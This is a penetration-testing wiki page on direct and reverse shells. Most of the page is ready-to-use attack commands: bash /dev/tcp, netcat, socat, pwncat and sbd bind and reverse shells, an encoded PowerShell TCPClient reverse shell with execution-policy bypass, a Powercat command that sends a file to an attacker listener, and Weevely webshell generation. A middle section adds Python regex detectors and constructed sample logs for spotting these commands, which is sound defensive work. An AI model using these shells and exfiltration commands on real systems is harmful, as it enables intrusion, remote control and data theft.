Direct and reverse shells

Penetration Testing Wiki

Once we are able to execute code remotely, whether through a known vulnerability, a SQL injection or an RFI (Remote File Inclusion), it is extremely important to move on to the post-exploitation phases and spawn a shell.

Direct shells are used when the compromised machine is directly reachable from the Internet and the firewall allows incoming traffic (INGRESS filtering) to that specific port.

We use reverse shells in most cases, because the compromised machine is usually sitting inside a LAN or behind several layers of security. One of the perks of reverse shells is that firewalls usually do not limit outgoing traffic (EGRESS filtering).

Classic methods to spawn remote shells

bash

How to trigger a bash reverse shell:

On attacker:

nc -nvv -lp 8080

On target:

bash -i >& /dev/tcp/$IP/8080 0>&1

netcat

How to trigger a netcat bindshell:

On target:

nc -nvvlp 8989 -e /bin/bash

On attacker:

nc -nvv $IP 8989

How to trigger a netcat reverse shell:

On attacker:

nc -nvvlp 8989

On target:

nc -nvv $IP 8989 -e /bin/bash

  • To improve the interactive shell (Method 1), on the attacker's terminal:

Ctrl+Z
stty raw -echo
fg
reset

  • To improve the interactive shell (Method 2), on target:

python -c 'import pty; pty.spawn("/bin/bash")'

socat

Syntax:

socat [options] address1 address2

Examples of address:

  • stdio
  • tcp4:localhost:1080
  • tcp4-listen:8080 = tcp-l:8080
  • udp4:host:2049
  • udp4-l:500
  • exec:/bin/ls,pty
  • socks:socks.local:$IP:80
  • proxy:proxy.local:$IP:443
  • ssl-l:443,cert=./server.pem
  • open:file.txt
  • create:newfile.txt
  • UDP4-DATAGRAM:255.255.255.255:9999,bind=:9999,range=192.168.0.0/24
  • TUN:192.168.1.2/24,iff-up=1

How to trigger a bindshell with Socat:

On target:

socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane

On attacker:

socat FILE:`tty`,raw,echo=0 TCP:$IP:1337

How to trigger a reverse shell with Socat:

On attacker:

socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0

On target:

socat TCP4:$IP:1337 EXEC:bash,pty,stderr,setsid,sigint,sane

pwncat

https://pwncat.readthedocs.io/en/latest/usage.html

https://github.com/cytopia/pwncat

Listener on attacker:

pwncat -l 4444

Bind shell:

pwncat -l -e '/bin/bash' 8080 -k

Reverse shell:

pwncat -e '/bin/bash' example.com 4444 --reconn --reconn-wait 1

Direct shell with mosh

Mosh allows resilient sessions over low-signal links or to servers with intermittent connectivity.

mosh --ssh="ssh -p 2222" example.org

More info: https://mosh.org/#usage

How to trigger a direct or reverse shell with Msfvenom:

Learn how to spawn remote shells with Metasploit Msfvenom in Msfvenom Payloads Cheat Sheet.

How to trigger a direct or reverse shell with sbd:

Syntax:

connect (tcp): sbd [-options] host port
listen (tcp):  sbd -l -p port [-options]

Spawn a bindshell on port 4444 on target:

sbd -l -p 4444 -e bash -v -n

Connect to the bindshell from the attacker:

sbd 192.168.1.202 4444

Build a VPN with socat:

On server:

socat tcp-l:50500 TUN:192.168.10.2/24,iff-up=1

On client ($IP is the server's address):

socat tcp:$IP:50500 TUN:192.168.10.3/24,iff-up=1

Windows Powershell Direct shell

Set $LHOST and $LPORT to the listener's address and port first (the script connects back to them), then build the encoded command:

$str='$client=New-Object System.Net.Sockets.TCPClient("'+$LHOST+'",'+$LPORT+');$stream= $client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data =(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String );$sendback2=$sendback+"PS "+(pwd).Path+"> ";$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$b=[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
echo "powershell -ep bypass -nop -encodedcommand $b" | clip

Then paste it (Ctrl+V) directly into the target terminal.
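Every listener and shell command on this page leaves a recognisable shape in process-creation telemetry (auditd execve records, Sysmon event 1, EDR command lines), which is what a blue team matches on. As an added example that is not part of this wiki, the following Python matches the bash /dev/tcp, nc/sbd/pwncat -e, socat EXEC and pty.spawn shapes from the sections above in constructed sample log lines, and decodes the UTF-16LE/base64 -encodedcommand form that the PowerShell clip one-liner produces; the regexes, the log format and the sample entries are my assumptions.

```python
import base64
import re
# Shapes of the shell-spawning commands shown above; these regexes are constructed for this example.
SHELL_PATTERNS = {
    "bash_dev_tcp": re.compile(r"bash\s+-i\s+>&\s*/dev/tcp/"),
    "exec_flag_shell": re.compile(r"\b(?:nc|ncat|netcat|sbd|pwncat)\b.*\s-e\s+'?(?:/bin/)?(?:ba)?sh"),
    "socat_exec": re.compile(r"\bsocat\b.*\bEXEC:(?:/bin/)?(?:ba)?sh", re.I),
    "pty_spawn": re.compile(r"pty\.spawn\("),
}
PS_ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
PS_TCPCLIENT = re.compile(r"Net\.Sockets\.TCPClient\(", re.I)

def decode_powershell(cmdline):
    """UTF-16LE text behind -encodedcommand, or None if absent or undecodable."""
    m = PS_ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(cmdline):
    """Names of the shell-spawning shapes present in one process command line."""
    hits = [name for name, rx in SHELL_PATTERNS.items() if rx.search(cmdline)]
    decoded = decode_powershell(cmdline)
    if decoded is not None and PS_TCPCLIENT.search(decoded):
        hits.append("powershell_tcpclient")
    return hits

def scan(log_lines):
    """Parse '<timestamp> <user> <cmdline>' lines; return (user, cmdline, hits) per match."""
    findings = []
    for line in log_lines:
        _ts, user, cmd = line.split(" ", 2)
        hits = classify(cmd)
        if hits:
            findings.append((user, cmd, hits))
    return findings
# Constructed sample log. The PowerShell entry is encoded the way the clip one-liner above does it.
PS_PLAIN = '$client=New-Object System.Net.Sockets.TCPClient("10.0.0.5",4444)'
PS_B64 = base64.b64encode(PS_PLAIN.encode("utf-16-le")).decode("ascii")
SAMPLE_LOG = [
    "2024-05-01T10:00:00Z www-data bash -i >& /dev/tcp/10.0.0.5/8080 0>&1",
    "2024-05-01T10:00:05Z www-data nc -nvv 10.0.0.5 8989 -e /bin/bash",
    "2024-05-01T10:00:09Z alice bash -c \"ls -la /var/www\"",
    "2024-05-01T10:00:12Z www-data socat TCP4:10.0.0.5:1337 EXEC:bash,pty,stderr,setsid,sigint,sane",
    "2024-05-01T10:00:20Z www-data python -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "2024-05-01T10:00:30Z bob powershell -ep bypass -nop -encodedcommand " + PS_B64,
    "2024-05-01T10:00:40Z carol nc -vvlp 80",
]
```

Running scan(SAMPLE_LOG) flags the five shell-spawning entries and leaves the plain bash -c and the bare listener alone; a plain listener without -e is only suspicious in context, so it is deliberately not matched.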

USB man-in-the-middle

  • Proxy a USB serial device (/dev/ttyUSB0) over IP

Remote:

socat /dev/ttyUSB0,raw,echo=0 tcp-listen:1337,reuseaddr

Local:

socat PTY,raw,echo=0,link=/dev/ttyVUSB0 tcp:$TARGET:1337

tsh

Tiny SHell (tsh) is an open-source UNIX backdoor written in C.

Powershell modules

Powercat

Powercat provides netcat functionality in PowerShell, with no extra packages required. Good for data exfiltration.

On target (send input.txt to the listener at $IP on port 80):

powershell -exec bypass
Import-Module .\powercat.ps1
powercat -c $IP -p 80 -i input.txt

On attacker:

nc -vvlp 80 > input.txt

Reference: https://github.com/besimorhino/powercat

Webshells

Weevely

python weevely.py generate AbC /var/www/html/AbC.txt

Learn how to create webshells with Metasploit Msfvenom in Msfvenom payloads Cheat Sheet.